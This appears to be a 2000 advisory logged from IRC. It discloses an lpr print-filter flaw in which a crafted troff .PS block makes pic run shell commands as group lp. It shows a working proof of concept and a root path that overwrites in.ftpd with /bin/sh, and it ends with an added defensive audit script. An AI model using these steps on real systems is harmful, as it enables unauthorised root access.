details of an exploit against lpr-0.50-4 (at least) (also affects other systems that may have the same print filters)

URL      : http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
AFFECTS  : lpr-0.50-4 & earlier
SEVERITY : local ROOT possible.
SYNOPSIS : escalation of group permissions, leading to an exploit that is available to every user except root. root is sometimes available as well. (wu-ftpd-2.6.0-14.6x binaries are owned by user bin, and can be overwritten allowing root access if wu-ftpd is installed.)

http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt

This is a log of an advisory given in channel #roothat on irc.pulltheplug.com, October 16 2000.

!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!

--> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer printer and j00 get a new group of friends. and stuff.
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000
--- noid gives channel operator status to zen-parse
hey zen
zen-parse lockdown
lo all
what's this topic all about then zen?
new hole in lpr package for redhat and... ;]
you releasing it ?
--> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat
[zen@continuity /tmp]$ id
uid=500(zen) gid=500(zen) groups=500(zen)
[zen@continuity /tmp]$ cat asdf
.PS
sh D/usr/bin/id>/tmp/yougetanyideasyetD
.PF
[zen@continuity /tmp]$ lpr asdf
[zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
uid=500(zen) gid=500(zen) groups=7(lp)
[zen@continuity /tmp]$
consider it released
erm... missing a line...
heh
and should be
ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideasyet
-rw-rw-rw- 1 zen zen 39 Oct 16 22:08 /tmp/yougetanyideasyet
as the output
only gid lp ?
ehm
heh
but:
-r-sr-sr-x 1 root lp 16292 Jan 10 2000 /usr/bin/lpr *
<-- schematic|ZzZz has quit (Ping timeout)
that's not where the magic happens though.
;]
needs a running lpd and a printer that does troff, e.g. PostScript
cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
zen...write a bugtraq advisory but get really really stoned first.
hehe
`grog -Tps -msafer $TMP_FILE`
log this... use this as an advisory. ;]
that is where the magic happens.
grog is a perl script that selects the correct command line options for groff.
groff can, if asked, run a variety of other programs, such as eqn (for equations), tbl (for tables) and pic (for compiling pictures).
the -msafer means to disallow the call to any dangerous functions, such as executing a command or creating or modifying a file.
However pic is called without that option being passed, even though it does have a -S switch, which runs it in safer mode.
zen-parse
The lpd checks what type of file the file is with a program called file
hmm looks perty yummy
the type of this file is troff or preprocessor...
<-- possem has quit (Quit: )
so the daemon then hands it to the appropriate filters to print, one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi which contains the grog command, which causes groff to run pic on the file, and pic executes the file we specify as the user the file was printed by.
with one exception. you have been set to have a list of groups which just contains one group. lp
hmm
(btw: group lp can edit all the configuration files for lpd. lpd can run the commands as any user (except root). however, if u have wuftpd installed, there is a root exploit.
-rwxr-xr-x 1 bin bin 162608 Oct 14 19:36 /usr/sbin/in.ftpd
lrwxrwxrwx 1 bin bin 7 Sep 23 02:30 /usr/sbin/wu.ftpd -> in.ftpd
gain user bin, and copy /bin/sh over in.ftpd
heh
telnet to port 21, and you have root. so it is a root exploit on systems with wuftpd. and just every other uid on systems with lpd running. )
heh, nice
there also appears to be an error file attempting to be made just after privileges are dropped, but it has insufficient rights at that moment to actually succeed.
the directory is owned by root, and only has lp write access because the lpd runs as root.
um. you dats my advisory ;]
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D
ew
-- zen-parse ;]
hehe i like yer bugtraq posts better... ya get all the leeto ascii in there and all...
ok... now ima save the buffer and submit it to bugtraq ;]
kewl
--> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat
that'd be a cool advisory

!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!

in memory of lucky.
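An added hardening check, written for this post and not part of zen-parse's advisory or of the Red Hat print filters: a POSIX sh audit that flags grog/groff invocations in filter scripts that rely on -msafer without -S. groff's -S (safer mode) passes -S on to pic as well as -msafer to troff, which is the gap the log describes; the filter file names and their sample contents below are constructed.

```shell
#!/bin/sh
# Added example, not from the advisory: audit print-filter scripts such as
# the .fpi files under /usr/lib/rhs/rhs-printfilters for grog/groff calls
# that do not pass -S. groff -S is "safer mode": it hands -S to pic as well
# as -msafer to troff, whereas -msafer alone only restricts troff, so pic
# still executes 'sh' commands embedded in the print job.

# audit_filter FILE: print each grog/groff line lacking -S; return 0 if the
# file is clean, 1 if any unsafe invocation was found.
audit_filter() {
    _file=$1
    _bad=0
    while IFS= read -r _line || [ -n "$_line" ]; do
        case "$_line" in
            '#'*) continue ;;                           # skip comment lines
            *grog*|*groff*)
                case " $_line " in
                    *" -S "*) ;;                        # safer mode present
                    *) printf 'UNSAFE %s: %s\n' "$_file" "$_line"; _bad=1 ;;
                esac ;;
        esac
    done < "$_file"
    return $_bad
}

# Constructed sample filters (stand-ins for the real Red Hat files): the
# first carries the line quoted in the log, the second the hardened form.
_dir=$(mktemp -d)
printf '#!/bin/sh\n%s\n' 'grog -Tps -msafer $TMP_FILE' > "$_dir/weak.fpi"
printf '#!/bin/sh\n%s\n' 'grog -S -Tps $TMP_FILE'      > "$_dir/fixed.fpi"

for _f in "$_dir/weak.fpi" "$_dir/fixed.fpi"; do
    if audit_filter "$_f"; then echo "$_f: ok"; fi
done
```

Run it against every filter script lpd can invoke; a flagged line means print jobs from any local user reach pic with command execution enabled.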